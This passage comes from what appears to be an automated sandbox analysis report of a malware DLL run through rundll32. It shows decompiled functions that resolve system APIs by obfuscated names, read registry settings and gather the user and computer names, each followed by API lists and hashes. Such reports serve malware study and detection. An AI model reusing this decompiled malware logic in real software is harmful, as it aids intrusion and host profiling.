						_t33 = E04BF10CA(_t72, _t70, _t50 ^ 0x0cf9b7cf);
					}
					if(_t33 != 0) {
						_t72 =  &_v8;
						if(StrToIntExA(_t33, 0,  &_v8) != 0) {
							 *0x4bfd02c = _v8;
						}
					}
					if(_t70 == 0) {
						_t34 = 0;
					} else {
						_t46 =  *0x4bfd2a0; // 0x59935a40
						_t34 = E04BF10CA(_t72, _t70, _t46 ^ 0x163b337e);
					}
					if(_t34 != 0) {
						_push(_t34);
						_t43 = 0x10;
						_t44 = E04BFA2EF(_t43);
						if(_t44 != 0) {
							_push(_t44);
							E04BF9B10();
						}
					}
					if(_t70 == 0) {
						_t35 = 0;
					} else {
						_t41 =  *0x4bfd2a0; // 0x59935a40
						_t35 = E04BF10CA(_t72, _t70, _t41 ^ 0x89f501b6);
					}
					if(_t35 != 0 && E04BFA2EF(0, _t35) != 0) {
						_t86 =  *0x4bfd324; // 0x70d95b0
						E04BF4C3A(_t86 + 4, _t39);
					}
					HeapFree( *0x4bfd238, 0, _t70);
					return 0;
				}
			}





























                                          0x04bf98f7
                                          0x04bf98f7
                                          0x04bf98f7
                                          0x04bf98f7
                                          0x04bf98fa
                                          0x04bf98fb
                                          0x04bf98fc
                                          0x04bf9916
                                          0x04bf9924
                                          0x04bf9924
                                          0x04bf9929
                                          0x04bf9943
                                          0x04bf9ad2
                                          0x04bf9ad4
                                          0x04bf9949
                                          0x04bf9949
                                          0x04bf994a
                                          0x04bf994d
                                          0x04bf994e
                                          0x04bf9953
                                          0x04bf9969
                                          0x04bf9955
                                          0x04bf9955
                                          0x04bf9962
                                          0x04bf9962
                                          0x04bf9973
                                          0x04bf9975
                                          0x04bf997f
                                          0x04bf9984
                                          0x04bf9984
                                          0x04bf997f
                                          0x04bf998b
                                          0x04bf99a1
                                          0x04bf998d
                                          0x04bf998d
                                          0x04bf999a
                                          0x04bf999a
                                          0x04bf99a5
                                          0x04bf99a7
                                          0x04bf99b1
                                          0x04bf99b6
                                          0x04bf99b6
                                          0x04bf99b1
                                          0x04bf99bd
                                          0x04bf99d3
                                          0x04bf99bf
                                          0x04bf99bf
                                          0x04bf99cc
                                          0x04bf99cc
                                          0x04bf99d7
                                          0x04bf99d9
                                          0x04bf99e3
                                          0x04bf99e8
                                          0x04bf99e8
                                          0x04bf99e3
                                          0x04bf99ef
                                          0x04bf9a05
                                          0x04bf99f1
                                          0x04bf99f1
                                          0x04bf99fe
                                          0x04bf99fe
                                          0x04bf9a09
                                          0x04bf9a0b
                                          0x04bf9a15
                                          0x04bf9a1a
                                          0x04bf9a1a
                                          0x04bf9a15
                                          0x04bf9a21
                                          0x04bf9a37
                                          0x04bf9a23
                                          0x04bf9a23
                                          0x04bf9a30
                                          0x04bf9a30
                                          0x04bf9a3b
                                          0x04bf9a3d
                                          0x04bf9a47
                                          0x04bf9a4c
                                          0x04bf9a4c
                                          0x04bf9a47
                                          0x04bf9a53
                                          0x04bf9a69
                                          0x04bf9a55
                                          0x04bf9a55
                                          0x04bf9a62
                                          0x04bf9a62
                                          0x04bf9a6d
                                          0x04bf9a6f
                                          0x04bf9a72
                                          0x04bf9a73
                                          0x04bf9a7a
                                          0x04bf9a7c
                                          0x04bf9a7d
                                          0x04bf9a7d
                                          0x04bf9a7a
                                          0x04bf9a84
                                          0x04bf9a9a
                                          0x04bf9a86
                                          0x04bf9a86
                                          0x04bf9a93
                                          0x04bf9a93
                                          0x04bf9a9e
                                          0x04bf9aac
                                          0x04bf9ab6
                                          0x04bf9ab6
                                          0x04bf9ac3
                                          0x04bf9acf
                                          0x04bf9acf

                                          APIs
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF997B
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF99AD
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF99DF
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9A11
                                          • StrToIntExA.SHLWAPI(00000000,00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9A43
                                          • HeapFree.KERNEL32(00000000,?,00000005,04BFD00C,00000008,?,?,59935A40,?,?,59935A40,?,?,?,04BF4A8B), ref: 04BF9AC3
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: FreeHeap
                                          • String ID:
                                          • API String ID: 3298025750-0
                                          • Opcode ID: 76772d672ca415fa075afa6a7b3354706422983fbdbf73ee3258b0a4d863618e
                                          • Instruction ID: a2ba34a799db3b2b7402edc0be06875649ab5b8be096692e7b9eb5c851f229e6
                                          • Opcode Fuzzy Hash: 76772d672ca415fa075afa6a7b3354706422983fbdbf73ee3258b0a4d863618e
                                          • Instruction Fuzzy Hash: 685184B1700104EEEB10EBB8DD84E5B76EDEB8870476449A6E70ED7108F635FD499A70
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF135B, Relevance: 9.1, APIs: 6, Instructions: 126memoryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • SysAllocString.OLEAUT32(00000000), ref: 04BF13B5
                                          • SysAllocString.OLEAUT32(0070006F), ref: 04BF13C9
                                          • SysAllocString.OLEAUT32(00000000), ref: 04BF13DB
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF1443
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF1452
                                          • SysFreeString.OLEAUT32(00000000), ref: 04BF145D
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: String$AllocFree
                                          • String ID:
                                          • API String ID: 344208780-0
                                          • Opcode ID: c6bfe8a5c206985dc7f7e870f338d1e3f8a33ba7fed2095428c9c54827e47bae
                                          • Instruction ID: 53aa70d8a052e7ab4570905a721eb08ec5bf7328465ebd851faa91c39af308e5
                                          • Opcode Fuzzy Hash: c6bfe8a5c206985dc7f7e870f338d1e3f8a33ba7fed2095428c9c54827e47bae
                                          • Instruction Fuzzy Hash: 3D413F35900609ABDB01DFFCD844A9EB7B9EF89301F144466EE18EB110DA75ED4ACFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF57D8, Relevance: 9.1, APIs: 6, Instructions: 81libraryloaderCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF57D8(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12) {
				intOrPtr _v8;
				intOrPtr _t23;
				intOrPtr _t26;
				_Unknown_base(*)()* _t28;
				intOrPtr _t30;
				_Unknown_base(*)()* _t32;
				intOrPtr _t33;
				_Unknown_base(*)()* _t35;
				intOrPtr _t36;
				_Unknown_base(*)()* _t38;
				intOrPtr _t39;
				_Unknown_base(*)()* _t41;
				intOrPtr _t44;
				struct HINSTANCE__* _t48;
				intOrPtr _t54;

				_t54 = E04BF58BE(0x20);
				if(_t54 == 0) {
					_v8 = 8;
				} else {
					_t23 =  *0x4bfd2a4; // 0x24da5a8
					_t1 = _t23 + 0x4bfe11a; // 0x4c44544e
					_t48 = GetModuleHandleA(_t1);
					_t26 =  *0x4bfd2a4; // 0x24da5a8
					_t2 = _t26 + 0x4bfe769; // 0x7243775a
					_v8 = 0x7f;
					_t28 = GetProcAddress(_t48, _t2);
					 *(_t54 + 0xc) = _t28;
					if(_t28 == 0) {
						L8:
						E04BF147E(_t54);
					} else {
						_t30 =  *0x4bfd2a4; // 0x24da5a8
						_t5 = _t30 + 0x4bfe756; // 0x614d775a
						_t32 = GetProcAddress(_t48, _t5);
						 *(_t54 + 0x10) = _t32;
						if(_t32 == 0) {
							goto L8;
						} else {
							_t33 =  *0x4bfd2a4; // 0x24da5a8
							_t7 = _t33 + 0x4bfe40b; // 0x6e55775a
							_t35 = GetProcAddress(_t48, _t7);
							 *(_t54 + 0x14) = _t35;
							if(_t35 == 0) {
								goto L8;
							} else {
								_t36 =  *0x4bfd2a4; // 0x24da5a8
								_t9 = _t36 + 0x4bfe4d2; // 0x4e6c7452
								_t38 = GetProcAddress(_t48, _t9);
								 *(_t54 + 0x18) = _t38;
								if(_t38 == 0) {
									goto L8;
								} else {
									_t39 =  *0x4bfd2a4; // 0x24da5a8
									_t11 = _t39 + 0x4bfe779; // 0x6c43775a
									_t41 = GetProcAddress(_t48, _t11);
									 *(_t54 + 0x1c) = _t41;
									if(_t41 == 0) {
										goto L8;
									} else {
										 *((intOrPtr*)(_t54 + 4)) = _a4;
										 *((intOrPtr*)(_t54 + 8)) = 0x40;
										_t44 = E04BF7B01(_t54, _a8);
										_v8 = _t44;
										if(_t44 != 0) {
											goto L8;
										} else {
											 *_a12 = _t54;
										}
									}
								}
							}
						}
					}
				}
				return _v8;
			}


















                                          0x04bf57e7
                                          0x04bf57eb
                                          0x04bf58ad
                                          0x04bf57f1
                                          0x04bf57f1
                                          0x04bf57f6
                                          0x04bf5809
                                          0x04bf580b
                                          0x04bf5810
                                          0x04bf5818
                                          0x04bf581f
                                          0x04bf5821
                                          0x04bf5826
                                          0x04bf58a5
                                          0x04bf58a6
                                          0x04bf5828
                                          0x04bf5828
                                          0x04bf582d
                                          0x04bf5835
                                          0x04bf5837
                                          0x04bf583c
                                          0x00000000
                                          0x04bf583e
                                          0x04bf583e
                                          0x04bf5843
                                          0x04bf584b
                                          0x04bf584d
                                          0x04bf5852
                                          0x00000000
                                          0x04bf5854
                                          0x04bf5854
                                          0x04bf5859
                                          0x04bf5861
                                          0x04bf5863
                                          0x04bf5868
                                          0x00000000
                                          0x04bf586a
                                          0x04bf586a
                                          0x04bf586f
                                          0x04bf5877
                                          0x04bf5879
                                          0x04bf587e
                                          0x00000000
                                          0x04bf5880
                                          0x04bf5886
                                          0x04bf588b
                                          0x04bf5892
                                          0x04bf5897
                                          0x04bf589c
                                          0x00000000
                                          0x04bf589e
                                          0x04bf58a1
                                          0x04bf58a1
                                          0x04bf589c
                                          0x04bf587e
                                          0x04bf5868
                                          0x04bf5852
                                          0x04bf583c
                                          0x04bf5826
                                          0x04bf58bb

                                          APIs
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04BF14AF,?,?,?,?,00000000,00000000), ref: 04BF57FD
                                          • GetProcAddress.KERNEL32(00000000,7243775A), ref: 04BF581F
                                          • GetProcAddress.KERNEL32(00000000,614D775A), ref: 04BF5835
                                          • GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04BF584B
                                          • GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04BF5861
                                          • GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04BF5877
                                            • Part of subcall function 04BF7B01: memset.NTDLL ref: 04BF7B80
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: AddressProc$AllocateHandleHeapModulememset
                                          • String ID:
                                          • API String ID: 1886625739-0
                                          • Opcode ID: e3c17995ec2ab6258a18d59f0d60556d8ab98ea1b8893527c48a625fc07d1dea
                                          • Instruction ID: 2d228057d226c56e01cc2a4752b422b6abb15405e0c4bcfd25d4de3b5c119c55
                                          • Opcode Fuzzy Hash: e3c17995ec2ab6258a18d59f0d60556d8ab98ea1b8893527c48a625fc07d1dea
                                          • Instruction Fuzzy Hash: 182110B160060AFFEB20DFA9CC44D6AB7ECEF453047054566EA0DDB211EB74F9098B60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BFA642, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 173stringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 88%
                                          			E04BFA642(void* __ecx, char* _a8, int _a16, intOrPtr* _a20, char _a24) {
				signed int _v8;
				char _v12;
				signed int* _v16;
				void _v284;
				void* __esi;
				char* _t60;
				intOrPtr* _t61;
				intOrPtr _t65;
				char _t68;
				intOrPtr _t72;
				void* _t73;
				intOrPtr _t75;
				void* _t78;
				void* _t88;
				void* _t96;
				void* _t97;
				int _t102;
				signed int* _t104;
				intOrPtr* _t105;
				void* _t106;

				_t97 = __ecx;
				_v8 = _v8 & 0x00000000;
				_t102 = _a16;
				if(_t102 == 0) {
					__imp__( &_v284,  *0x4bfd33c);
					_t96 = 0x80000002;
					L6:
					_t60 = E04BFA5E9(0,  &_v284);
					_a8 = _t60;
					if(_t60 == 0) {
						_v8 = 8;
						L29:
						_t61 = _a20;
						if(_t61 != 0) {
							 *_t61 =  *_t61 + 1;
						}
						return _v8;
					}
					_t105 = _a24;
					if(E04BF621D(_t97, _t105, _t96, _t60) != 0) {
						L27:
						E04BF147E(_a8);
						goto L29;
					}
					_t65 =  *0x4bfd2a4; // 0x24da5a8
					_t16 = _t65 + 0x4bfe8de; // 0x65696c43
					_t68 = E04BFA5E9(0, _t16);
					_a24 = _t68;
					if(_t68 == 0) {
						L14:
						_t29 = _t105 + 0x14; // 0x102
						_t33 = _t105 + 0x10; // 0x3d04bfc0
						if(E04BF4C9A( *_t33, _t96, _a8,  *0x4bfd334,  *((intOrPtr*)( *_t29 + 0x28))) == 0) {
							_t72 =  *0x4bfd2a4; // 0x24da5a8
							if(_t102 == 0) {
								_t35 = _t72 + 0x4bfea54; // 0x4d4c4b48
								_t73 = _t35;
							} else {
								_t34 = _t72 + 0x4bfea4f; // 0x55434b48
								_t73 = _t34;
							}
							if(E04BF30FC( &_a24, _t73,  *0x4bfd334,  *0x4bfd338,  &_a24,  &_a16) == 0) {
								if(_t102 == 0) {
									_t75 =  *0x4bfd2a4; // 0x24da5a8
									_t44 = _t75 + 0x4bfe856; // 0x74666f53
									_t78 = E04BFA5E9(0, _t44);
									_t103 = _t78;
									if(_t78 == 0) {
										_v8 = 8;
									} else {
										_t47 = _t105 + 0x10; // 0x3d04bfc0
										E04BF1BC1( *_t47, _t96, _a8,  *0x4bfd338, _a24);
										_t49 = _t105 + 0x10; // 0x3d04bfc0
										E04BF1BC1( *_t49, _t96, _t103,  *0x4bfd330, _a16);
										E04BF147E(_t103);
									}
								} else {
									_t40 = _t105 + 0x10; // 0x3d04bfc0
									E04BF1BC1( *_t40, _t96, _a8,  *0x4bfd338, _a24);
									_t43 = _t105 + 0x10; // 0x3d04bfc0
									E04BF1BC1( *_t43, _t96, _a8,  *0x4bfd330, _a16);
								}
								if( *_t105 != 0) {
									E04BF147E(_a24);
								} else {
									 *_t105 = _a16;
								}
							}
						}
						goto L27;
					}
					_t21 = _t105 + 0x10; // 0x3d04bfc0
					if(E04BF74B9( *_t21, _t96, _a8, _t68,  &_v16,  &_v12) == 0) {
						_t104 = _v16;
						_t88 = 0x28;
						if(_v12 == _t88) {
							 *_t104 =  *_t104 & 0x00000000;
							_t26 = _t105 + 0x10; // 0x3d04bfc0
							E04BF4C9A( *_t26, _t96, _a8, _a24, _t104);
						}
						E04BF147E(_t104);
						_t102 = _a16;
					}
					E04BF147E(_a24);
					goto L14;
				}
				if(_t102 <= 8 || _t102 + 0x2a >= 0x104 || StrChrA(_a8, 0x5f) != 0) {
					goto L29;
				} else {
					memcpy( &_v284, _a8, _t102);
					__imp__(_t106 + _t102 - 0x117,  *0x4bfd33c);
					 *((char*)(_t106 + _t102 - 0x118)) = 0x5c;
					_t96 = 0x80000003;
					goto L6;
				}
			}























                                          0x04bfa642
                                          0x04bfa64b
                                          0x04bfa652
                                          0x04bfa657
                                          0x04bfa6c6
                                          0x04bfa6cc
                                          0x04bfa6d1
                                          0x04bfa6da
                                          0x04bfa6df
                                          0x04bfa6e4
                                          0x04bfa858
                                          0x04bfa85f
                                          0x04bfa85f
                                          0x04bfa864
                                          0x04bfa866
                                          0x04bfa866
                                          0x04bfa86f
                                          0x04bfa86f
                                          0x04bfa6ea
                                          0x04bfa6f6
                                          0x04bfa84e
                                          0x04bfa851
                                          0x00000000
                                          0x04bfa851
                                          0x04bfa6fc
                                          0x04bfa701
                                          0x04bfa70a
                                          0x04bfa70f
                                          0x04bfa714
                                          0x04bfa75e
                                          0x04bfa75e
                                          0x04bfa771
                                          0x04bfa77b
                                          0x04bfa781
                                          0x04bfa788
                                          0x04bfa792
                                          0x04bfa792
                                          0x04bfa78a
                                          0x04bfa78a
                                          0x04bfa78a
                                          0x04bfa78a
                                          0x04bfa7b4
                                          0x04bfa7bc
                                          0x04bfa7ea
                                          0x04bfa7ef
                                          0x04bfa7f8
                                          0x04bfa7fd
                                          0x04bfa801
                                          0x04bfa833
                                          0x04bfa803
                                          0x04bfa810
                                          0x04bfa813
                                          0x04bfa823
                                          0x04bfa826
                                          0x04bfa82c
                                          0x04bfa82c
                                          0x04bfa7be
                                          0x04bfa7cb
                                          0x04bfa7ce
                                          0x04bfa7e0
                                          0x04bfa7e3
                                          0x04bfa7e3
                                          0x04bfa83d
                                          0x04bfa849
                                          0x04bfa83f
                                          0x04bfa842
                                          0x04bfa842
                                          0x04bfa83d
                                          0x04bfa7b4
                                          0x00000000
                                          0x04bfa77b
                                          0x04bfa723
                                          0x04bfa72d
                                          0x04bfa72f
                                          0x04bfa734
                                          0x04bfa738
                                          0x04bfa73a
                                          0x04bfa745
                                          0x04bfa748
                                          0x04bfa748
                                          0x04bfa74e
                                          0x04bfa753
                                          0x04bfa753
                                          0x04bfa759
                                          0x00000000
                                          0x04bfa759
                                          0x04bfa65c
                                          0x00000000
                                          0x04bfa683
                                          0x04bfa68e
                                          0x04bfa6a4
                                          0x04bfa6aa
                                          0x04bfa6b2
                                          0x00000000
                                          0x04bfa6b2

                                          APIs
                                          • StrChrA.SHLWAPI(04BF553C,0000005F,00000000,00000000,00000104), ref: 04BFA675
                                          • memcpy.NTDLL(?,04BF553C,?), ref: 04BFA68E
                                          • lstrcpy.KERNEL32(?), ref: 04BFA6A4
                                            • Part of subcall function 04BFA5E9: lstrlen.KERNEL32(?,00000000,04BFD330,00000001,04BF937A,04BFD00C,04BFD00C,00000000,00000005,00000000,00000000,?,?,?,04BF207E,?), ref: 04BFA5F2
                                            • Part of subcall function 04BFA5E9: mbstowcs.NTDLL ref: 04BFA619
                                            • Part of subcall function 04BFA5E9: memset.NTDLL ref: 04BFA62B
                                            • Part of subcall function 04BF1BC1: lstrlenW.KERNEL32(04BF553C,?,?,04BFA818,3D04BFC0,80000002,04BF553C,04BF9642,74666F53,4D4C4B48,04BF9642,?,3D04BFC0,80000002,04BF553C,?), ref: 04BF1BE1
                                            • Part of subcall function 04BF147E: HeapFree.KERNEL32(00000000,00000000,04BF1D11,00000000,?,?,-00000008), ref: 04BF148A
                                          • lstrcpy.KERNEL32(?,00000000), ref: 04BFA6C6
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: lstrcpylstrlen$FreeHeapmbstowcsmemcpymemset
                                          • String ID: \
                                          • API String ID: 2598994505-2967466578
                                          • Opcode ID: 32258dc3fa7071f6b0a7507d1ffbac355b2c169906c8dfe9e6dd1e885a9c349e
                                          • Instruction ID: 7493a4ad0a867ba1f4d8da25b447d2f25cc6b6ef02fddd3a51e556371194383f
                                          • Opcode Fuzzy Hash: 32258dc3fa7071f6b0a7507d1ffbac355b2c169906c8dfe9e6dd1e885a9c349e
                                          • Instruction Fuzzy Hash: 05510B7250020AEFDF15AFA4DD44D9A7BB9FB08314F008595FB1D97160E739ED299B20
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF614A, Relevance: 7.6, APIs: 5, Instructions: 83COMMON
                                          Download Yara Rule
                                          C-Code - Quality: 100%
                                          			E04BF614A() {
				long _v8;
				long _v12;
				int _v16;
				long _t39;
				long _t43;
				signed int _t47;
				short _t51;
				signed int _t52;
				int _t56;
				int _t57;
				char* _t64;
				short* _t67;

				_v16 = 0;
				_v8 = 0;
				GetUserNameW(0,  &_v8);
				_t39 = _v8;
				if(_t39 != 0) {
					_v12 = _t39;
					_v8 = 0;
					GetComputerNameW(0,  &_v8);
					_t43 = _v8;
					if(_t43 != 0) {
						_v12 = _v12 + _t43 + 2;
						_t64 = E04BF58BE(_v12 + _t43 + 2 << 2);
						if(_t64 != 0) {
							_t47 = _v12;
							_t67 = _t64 + _t47 * 2;
							_v8 = _t47;
							if(GetUserNameW(_t67,  &_v8) == 0) {
								L7:
								E04BF147E(_t64);
							} else {
								_t51 = 0x40;
								 *((short*)(_t67 + _v8 * 2 - 2)) = _t51;
								_t52 = _v8;
								_v12 = _v12 - _t52;
								if(GetComputerNameW( &(_t67[_t52]),  &_v12) == 0) {
									goto L7;
								} else {
									_t56 = _v12 + _v8;
									_t31 = _t56 + 2; // 0x4bf5210
									_v12 = _t56;
									_t57 = WideCharToMultiByte(0xfde9, 0, _t67, _t56, _t64, _t56 + _t31, 0, 0);
									_v8 = _t57;
									if(_t57 == 0) {
										goto L7;
									} else {
										_t64[_t57] = 0;
										_v16 = _t64;
									}
								}
							}
						}
					}
				}
				return _v16;
			}















                                          0x04bf6158
                                          0x04bf615b
                                          0x04bf615e
                                          0x04bf6164
                                          0x04bf6169
                                          0x04bf616f
                                          0x04bf6177
                                          0x04bf617a
                                          0x04bf6180
                                          0x04bf6185
                                          0x04bf6192
                                          0x04bf619f
                                          0x04bf61a3
                                          0x04bf61a5
                                          0x04bf61a9
                                          0x04bf61ac
                                          0x04bf61bc
                                          0x04bf620f
                                          0x04bf6210
                                          0x04bf61be
                                          0x04bf61c3
                                          0x04bf61c4
                                          0x04bf61c9
                                          0x04bf61cc
                                          0x04bf61df
                                          0x00000000
                                          0x04bf61e1
                                          0x04bf61e4
                                          0x04bf61e9
                                          0x04bf61f7
                                          0x04bf61fa
                                          0x04bf6200
                                          0x04bf6205
                                          0x00000000
                                          0x04bf6207
                                          0x04bf6207
                                          0x04bf620a
                                          0x04bf620a
                                          0x04bf6205
                                          0x04bf61df
                                          0x04bf6215
                                          0x04bf6216
                                          0x04bf6185
                                          0x04bf621c

                                          APIs
                                          • GetUserNameW.ADVAPI32(00000000,04BF520E), ref: 04BF615E
                                          • GetComputerNameW.KERNEL32(00000000,04BF520E), ref: 04BF617A
                                            • Part of subcall function 04BF58BE: RtlAllocateHeap.NTDLL(00000000,-00000008,04BF1C51), ref: 04BF58CA
                                          • GetUserNameW.ADVAPI32(00000000,04BF520E), ref: 04BF61B4
                                          • GetComputerNameW.KERNEL32(04BF520E,?), ref: 04BF61D7
                                          • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,04BF520E,00000000,04BF5210,00000000,00000000,?,?,04BF520E), ref: 04BF61FA
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: Name$ComputerUser$AllocateByteCharHeapMultiWide
                                          • String ID:
                                          • API String ID: 3850880919-0
                                          • Opcode ID: 31a3fe02d55467cf10c1ad05fc520029f458fcca8a178b9d7196b3b0e3a67010
                                          • Instruction ID: d5a9ffb4eb5f4fcf572416911ba1e0dd531ea04a11c357898c12fe9dd92e0eef
                                          • Opcode Fuzzy Hash: 31a3fe02d55467cf10c1ad05fc520029f458fcca8a178b9d7196b3b0e3a67010
                                          • Instruction Fuzzy Hash: BF21B9B6940108FFDB11DFE9D984DEEBBBDEF44304B5044AAEA05E7201E634AB45DB60
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 04BF62CD, Relevance: 7.6, APIs: 5, Instructions: 75memorystringCOMMON
                                          Download Yara Rule
                                          C-Code - Quality: 58%
                                          			E04BF62CD(void* __eax, void* _a4, intOrPtr _a8, void* _a12, int _a16, void** _a20, intOrPtr* _a24) {
				char _v5;
				signed int _v12;
				intOrPtr _v16;
				char _t28;
				void* _t36;
				void* _t41;
				char* _t42;
				void* _t44;
				void* _t49;
				void* _t50;
				int _t51;
				int _t54;
				void* _t55;

				_t49 = _a4;
				_t55 = __eax;
				_v12 = 0xb;
				if(_t49 != 0 && __eax != 0) {
					_t5 = _t55 - 1; // -1
					_t42 = _t49 + _t5;
					_t28 =  *_t42;
					_v5 = _t28;
					 *_t42 = 0;
					__imp__(_a8, _t41);
					_v16 = _t28;
					_t50 =  *0x4bfd114(_t49, _a8);
					if(_t50 != 0) {
						 *_t42 = _v5;
						_t44 = RtlAllocateHeap( *0x4bfd238, 0, _a16 + __eax);
						if(_t44 == 0) {
							_v12 = 8;
						} else {
							_t51 = _t50 - _a4;
							memcpy(_t44, _a4, _t51);
							_t36 = memcpy(_t44 + _t51, _a12, _a16);
							_t45 = _v16;
							_t54 = _a16;
							memcpy(_t36 + _t54, _t51 + _v16 + _a4, _t55 - _t51 - _t45);
							 *_a20 = _t44;
							_v12 = _v12 & 0x00000000;
							 *_a24 = _t55 - _v16 + _t54;
						}
					}
				}
				return _v12;
			}
















                                          0x04bf62d5
                                          0x04bf62d8
                                          0x04bf62da
                                          0x04bf62e3
                                          0x04bf62f5
                                          0x04bf62f5
                                          0x04bf62f9
                                          0x04bf62fb
                                          0x04bf62fe
                                          0x04bf6301
                                          0x04bf630a
                                          0x04bf6314
                                          0x04bf6318
                                          0x04bf631d
                                          0x04bf6333
                                          0x04bf6337
                                          0x04bf6388
                                          0x04bf6339
                                          0x04bf6339
                                          0x04bf6341
                                          0x04bf6350
                                          0x04bf6355
                                          0x04bf6365
                                          0x04bf636b
                                          0x04bf6376
                                          0x04bf6380
                                          0x04bf6384
                                          0x04bf6384
                                          0x04bf6337
                                          0x04bf638f
                                          0x04bf6396

                                          APIs
                                          • lstrlen.KERNEL32(7519F710,?,00000000,?,7519F710), ref: 04BF6301
                                          • RtlAllocateHeap.NTDLL(00000000,?), ref: 04BF632D
                                          • memcpy.NTDLL(00000000,0000000B,0000000B), ref: 04BF6341
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04BF6350
                                          • memcpy.NTDLL(00000000,0000000B,00000000,00000000,0000000B,00000000,00000000,0000000B,0000000B), ref: 04BF636B
                                          Memory Dump Source
                                          • Source File: 00000009.00000002.317725985.0000000004BF1000.00000020.00020000.sdmp, Offset: 04BF0000, based on PE: true
                                          • Associated: 00000009.00000002.317715984.0000000004BF0000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317747758.0000000004BFC000.00000002.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317755976.0000000004BFD000.00000004.00020000.sdmp Download File
                                          • Associated: 00000009.00000002.317774085.0000000004BFF000.00000002.00020000.sdmp Download File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_9_2_4bf0000_rundll32.jbxd
                                          Similarity
                                          • API ID: memcpy$AllocateHeaplstrlen
                                          • String ID:
